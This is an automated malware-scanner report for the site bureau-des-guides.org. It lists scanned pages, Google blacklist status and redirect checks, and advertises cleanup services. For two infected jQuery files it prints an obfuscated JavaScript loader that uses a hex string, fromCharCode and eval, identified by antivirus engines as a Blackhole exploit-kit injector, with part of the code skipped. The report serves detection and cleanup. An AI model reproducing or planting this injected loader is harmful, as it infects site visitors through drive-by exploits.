Malware Scanner report for bureau-des-guides.org

Malicious/Suspicious/Total urls checked: 2/0/6

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "bureau-des-guides.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bureau-des-guides.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.bureau-des-guides.org/	200 OK Content-Length: 17246 Content-Type: text/html	clean
http://www.bureau-des-guides.org/js/angejs.php?cs=fr	200 OK Content-Length: 3172 Content-Type: text/html	clean
http://www.bureau-des-guides.org/test404page.js	404 Not Found Content-Length: 406 Content-Type: text/html	clean
http://www.bureau-des-guides.org/js/jquery-1.4.4.min.js	200 OK Content-Length: 83464 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6a:64:58:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:64:58:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6a ... 3438 bytes are skipped ...5:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:64:58:5e:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1418!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.bureau-des-guides.org/js/jquery.prettyPhoto.js	200 OK Content-Length: 26591 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) aq="0x";bv=(5-3-1);sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6a:64:58:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6a:64:58:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6a ... 3438 bytes are skipped ...5:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6a:64:58:5e:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1418!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)} Antivirus reports: AntiVir JS/Blacole.EB.59 Avast JS:Decode-BHS [Trj] Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP K7AntiVirus Trojan Comodo Exploit.JS.Blacole.DO McAfee-GW-Edition JS/Exploit-Blacole.ht Microsoft Trojan:JS/BlacoleRef.DD MicroWorld-eScan JS:Exploit.BlackHole.JS McAfee JS/Exploit-Blacole.ht F-Secure JS:Exploit.BlackHole.AP F-Prot JS/IFrame.RS AVG JS/Exploit Norman Blacole.XN GData JS:Exploit.BlackHole.AP Commtouch JS/IFrame.RS BitDefender JS:Exploit.BlackHole.AP
http://www.bureau-des-guides.org/js/kcalendar.js.php	200 OK Content-Length: 3060 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bureau-des-guides.org

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: bureau-des-guides.org
Referer: http://www.google.com/search?q=bureau-des-guides.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for bureau-des-guides.org

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools